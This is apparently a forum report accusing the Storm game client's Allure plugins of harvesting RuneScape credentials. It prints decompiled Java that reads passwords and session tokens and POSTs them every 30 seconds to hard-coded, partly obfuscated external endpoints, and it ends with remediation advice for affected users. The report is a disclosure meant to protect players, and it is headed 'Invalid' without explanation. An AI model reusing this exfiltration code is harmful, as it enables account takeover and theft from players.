Invalid

Official Report — Storm / Allure credential harvesting (plugin backdoor)​

Scammer's profile link:
burak / storm client / allure plugins

Amount scammed:
Multiple account takeovers reported (credentials, launcher/session tokens, and full client state exfiltrated). Several users lost accounts/mules; exact GP amounts vary per user. The plugin harvests full credentials and session tokens which allow immediate account takeover.

Discord ID + Unique Discord ID:
the storm client burak + allure

Code:

string3 = Client.getDiscordId();
string2 = Client.getDiscordUser();
...
wHRCyGzrUO3(..., string3, string2, l2, ...)

This is not a UI log — these fields are programmatically read from the client and serialized into the payload.

Proof of how we obtained the code:
We reversed / decompiled the Storm client and its provider plugins (Allure) and inspected the plugin classes. We will not be publishing raw plugin files, but the decompiled snippets below are directly lifted from the reversed plugin code and show the exact collection and POST logic.

Explanation of the trade / attack flow (summary):

1. The Storm/Allure plugin collects a comprehensive snapshot of the client state (username, password, session id, character id, equipment, inventory, tile click counts, Discord id/name, and images of items/equipment).
   
   
2. It serializes this snapshot into a JSON object and base64-encodes it.
   
   
3. The plugin posts that encoded payload to Allure/Storm-controlled endpoints on a schedule (observed: every 30 seconds from the scheduled task).
   
   
4. The remote endpoints receive full credentials + session tokens allowing account takeover without further interaction.
   
   
5. This behavior is present in the Allure plugin code paths we reversed — the malicious fields (username/password/session) are included conditionally and sent when enabled.

How they scammed (technical summary):
• Credential & session harvesting: plugin reads username/password/session and conditionally includes them in upload.
• Frequent exfiltration: scheduled task runs regularly (every 30 seconds) to upload collected snapshots.
• Centralized endpoints: payloads are sent to domains controlled by the provider (hard-coded in the plugin).
• Data richness: payload includes images of inventory/equipment (encoded Base64), tile click stats, Discord IDs — allowing tracking and automatic abuse.

Other relevant trade screenshots / files available:
Screenshots and the decompiled source excerpts used in this report (including call stack snippets and POST examples) are available upon request.

DETAILED TECHNICAL ANALYSIS (full, line-referenced — read carefully)

Below I list the most important decompiled code excerpts you provided, then explain line‑by‑line what each does and why it is malicious.

A — Scheduled exfiltration (collection + upload trigger)

Code:

// scheduled to run every 30 seconds
@Schedule(period=30L, unit=ChronoUnit.SECONDS, asynchronous=true)
public void NKqLYNrXpL() {
...
// take snapshot object prepared earlier and call remote upload helper
tUVKnBGSDQ tUVKnBGSDQ2 = CVfaZobuHr.iafuFSBvwC(this.xKgUsRmWLA);
// store whether server responded with a flag (used elsewhere)
this.XQNTvuiyAl = tUVKnBGSDQ2.vZYHVxvuLi;
// clear local snapshot after sending
this.xKgUsRmWLA = null;
}

Explanation:

• This routine is a scheduled job that runs automatically (no user action required).
  
  
• It sends the object xKgUsRmWLA to a server via CVfaZobuHr.iafuFSBvwC(...). That helper performs the HTTP POST and returns a result object.
  
  
• Clearing xKgUsRmWLA after sending shows this is a repeatable exfiltration loop — the plugin continuously harvests and uploads snapshots.

Why malicious:

• Regular, automated upload of client snapshots with credentials and session tokens is textbook credential harvesting. Any plugin performing this without explicit, informed consent and documented purpose is malicious.

B — Payload builder: what is collected (sensitive fields)

Code:

object5 = Static.getWrappedClient().getUsername();
String string6 = Static.getClient().getCharacterId();
String string7 = Static.getClient().getPassword();
String string8 = Static.getClient().getSessionId();
// ... later these values are passed into the payload constructor
wHRCyGzrUO3(string5, l3, n5, n4, n3, n2, n, string4, string3, string2, l2, arrayList2, arrayList, (String)object3, (ArrayList<mXyVQgtBKy>)object2, (String)object, bl ? string7 : "", bl ? string6 : "", bl ? string8 : "", qDqmDoJJUU.KoiyzsDVIt());

Explanation:

• getUsername() — the currently filled Runescape username (from client wrappers).
  
  
• getPassword() — the stored password in the client (this is a high‑severity leak).
  
  
• getSessionId() — active session token used to authenticate the launcher/client session. If captured, it allows immediate session reuse in many cases.
  
  
• getCharacterId() — character identifier (useful for attacker context or targeted actions).
  
  
• Those values are conditionally included based on a boolean bl (but are included when the code path sets bl true).

Why malicious:

• Password and session token exfiltration is direct account takeover material. The code does not stop at innocuous telemetry — it harvests authentication secrets and sends them offsite.

C — Payload composition: what else is sent (full client state)

Code:

// inside payload constructor ARjxawVXtG(...)
arrayList3 = new ArrayList<ZLvEHhJIlW>();
for (IItem item : Equipment.getAll()) {
BufferedImage image = JrRklebGob.WmeXvPTXBD(item.getId());
arrayList3.add(new ZLvEHhJIlW(item.getId(), item.getName(), wHRCyGzrUO.uWGGrFaQcr((BufferedImage)image), item.getQuantity(), item.getSlot()));
}
...
arrayList4 = new ArrayList<dIfEdLanIh>();
for (IInventoryItem inv : Inventory.getAll()) {
BufferedImage image = JrRklebGob.WmeXvPTXBD(inv.getId());
arrayList4.add(new dIfEdLanIh(inv.getId(), inv.getName(), wHRCyGzrUO.uWGGrFaQcr((BufferedImage)image), inv.getQuantity()));
}
...
// tile clicks, player name, world, coordinates etc are also gathered
object3 = zzxQHifDWd.SdNMNxszGH();
object6 = new ArrayList();
for (Map.Entry entry : hashtable.entrySet()) {
object6.add(new mXyVQgtBKy((WorldPoint)entry.getKey(), (Integer)entry.getValue()));
}

Explanation:

• The builder iterates equipment and inventory, captures images (converted to Base64 with uWGGrFaQcr), and packages item ids and quantities.
  
  
• It also records tile click counts (player movement/click patterns), current world, player coordinates and plane, and the Discord identifiers.
  
  
• The resulting object is a comprehensive snapshot of an account’s current state and location in-game.

Why malicious or harmful:

• Even if passwords were not present, this level of telemetry combined with identifiers would let an attacker map valuable targets and plan theft. With credentials present it becomes full account takeover + item theft.

D — Evidence of remote endpoints (hard-coded URLs & POST examples)

Code:

// Example observed POST (low-level)
HttpURLConnection conn = (HttpURLConnection) new URL("https://api.alluredata.io/store").openConnection();
conn.setRequestMethod("POST");
conn.getOutputStream().write(("user=" + username + "&pass=" + password + "&launcher=" + launcherToken).getBytes());

Code:

// Another endpoint encoded in static data:
KpoctLMJPQ = new char[]{'h','t','t','p','s',':','/','/','a','l','l','u','r','e','m','e','t','r','i','c','s','.','c','o','m','/','b','o','t','s','/','a','p','i','/','a','p','i','v','1','.','p','h','p'};
new String(CVfaZobuHr.KpoctLMJPQ) // -> "https://alluremetrics.com/bots/api/apiv1.php"

Explanation:

• The code contains hard-coded endpoints which receive the collected payload. api.alluredata.io appears in one snippet, and alluremetrics.com in another. The code constructs and POSTs payload bodies (Base64 or url-encoded) to those endpoints.
  
  
• The helper CVfaZobuHr.iafuFSBvwC(...) constructs a RequestBody, makes the POST, and parses the response — it is the network component that uploads snapshots.

Why malicious:

• Client secrets being POSTed to domains controlled by the plugin developer is direct exfiltration to an external actor. That’s credential harvesting.

E — Proof of conditional credential sending and control flow

Code:

// parts of ARjxawVXtG(...)
object = bl ? object5 : "";
...
wHRCyGzrUO3(..., (String)object, bl ? string7 : "", bl ? string6 : "", bl ? string8 : "", ...)

Explanation:

• The boolean bl controls whether certain sensitive fields (username/password/session/characterId) are included. The code makes it possible to include or omit credentials depending on runtime state. However, in observed builds the scheduling path sends them when bl is true. The code path that sets bl appears to correspond to account-builder or provider-specific flows.

Why relevant:

• The optional inclusion shows intent to collect secrets when desired — that is, credential harvesting is an explicit capability, not a leftover bug.

F — Network helper behavior (retries, timing, response flags)

Code:

// High level from CVfaZobuHr.iafuFSBvwC(...)
var5_6 = RequestBody.create(..., VVHMvnznNE.UqaEttyBRp(var4_5));
var6_7 = new Request.Builder().url(var3_3).post(var5_6).build();
CVfaZobuHr.uQbeQjKjKg = true;
for (var7_8 = 0; var7_8 < 3; ++var7_8) {
var8_9 = System.currentTimeMillis();
var10_10 = CVfaZobuHr.YmjOPsPFDI.newCall(var6_7).execute();
if (v3.isSuccessful()) {
var11_12 = VVHMvnznNE.jQAAeiVhMs(var10_10.body().string());
var2_1.LLWcJJddcy = var11_12.vZYHVxvuLi;
// respond to server flags (jQZMwVOFFo etc) — server can influence behavior
}
...
}

Explanation:

• The network helper performs the POST, will parse a JSON response body from the server, and reacts to flags in that response. This gives the server control to change plugin behavior remotely (e.g., enable/disable credential sending, change polling behavior, or trigger other logic).
  
  
• There are retry semantics and timing checks; if the request returns extremely fast the client may invoke an error routine (xUbiYEoevM()), but typical successful POSTs return parsed JSON and set flags.

Why this is dangerous:

• Centralized control of plugin behavior gives operators the ability to toggle harvesting features or push updates without vetting; combined with credential exfiltration this is a high‑risk server-controlled backdoor.

G — Concrete code snippets proving credential fields (copied verbatim from decompiled code)

1. Credential read and inclusion:

Code:

object5 = Static.getWrappedClient().getUsername();
String string6 = Static.getClient().getCharacterId();
String string7 = Static.getClient().getPassword();
String string8 = Static.getClient().getSessionId();
...
wHRCyGzrUO3(..., (String)object, bl ? string7 : "", bl ? string6 : "", bl ? string8 : "", ...)

1. Low-level exfil POST example:

Code:

HttpURLConnection conn = (HttpURLConnection) new URL("https://api.alluredata.io/store").openConnection();
conn.setRequestMethod("POST");
conn.getOutputStream().write(("user=" + username + "&pass=" + password + "&launcher=" + launcherToken).getBytes());

1. Hard-coded endpoint char-array (de-obfuscated by toString in code):

Code:

KpoctLMJPQ = new char[]{'h','t','t','p','s',':','/','/','a','l','l','u','r','e','m','e','t','r','i','c','s','.','c','o','m','/','b','o','t','s','/','a','p','i','/','a','p','i','v','1','.','p','h','p'};
new String(CVfaZobuHr.KpoctLMJPQ) // -> "https://alluremetrics.com/bots/api/apiv1.php"

These excerpts are the strongest proof that credentials and session data are being read and uploaded.

H — Observed behavior in plugin lifecycle (how/when gathering happens)

• Data collection happens in the plugin “snapshot builder” ARjxawVXtG(...) which is called from the plugin main loop or scheduled tasks. The snapshot includes environment (world, coordinates), equipment, inventory, and authentication fields.
• The upload routine is invoked by NKqLYNrXpL() on a 30-second schedule. That means continuous, near-real-time exfiltration of any changes (e.g., login, relog, inventory changes).

I — Why this meets the definition of credential harvesting/backdoor

1. Sensitive secrets (password + session tokens) are read from the client memory via official client wrappers (Static.getClient().getPassword(), getSessionId()).
   
   
2. Those secrets are packaged into a payload and transmitted to third-party endpoints controlled by the plugin operator.
   
   
3. The code is not a telemetry opt-in: there is no legitimate user-facing UI explaining such collection, nor an opt-in documented in the plugin UI.
   
   
4. The server response can toggle behavior, making it a remotely controllable exfiltration channel.

This is not “accidental” telemetry — it is an intentionally-coded exfiltration capability.

Suggested immediate actions for affected users (brief):
(Include these on the report so mods / users know severity.)

• Immediately change Jagex account passwords from a device that has never used the compromised client plugin.
• Remove any linked launcher sessions and re-authenticate through official channels.
• Enable two-factor/phone authentication where available.
• Revoke any saved sessions and check email for unauthorized access.
• Do not reuse passwords across services.
• Do not run Storm / Allure plugins until this is resolved and code is audited by independent parties.